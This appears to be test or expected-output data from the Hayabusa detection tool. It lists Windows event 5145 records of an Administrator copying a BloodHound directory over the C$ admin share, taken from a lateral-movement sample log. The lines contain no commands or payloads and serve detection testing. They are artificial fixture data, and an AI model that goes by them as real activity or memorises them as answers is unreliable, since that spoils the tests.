+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
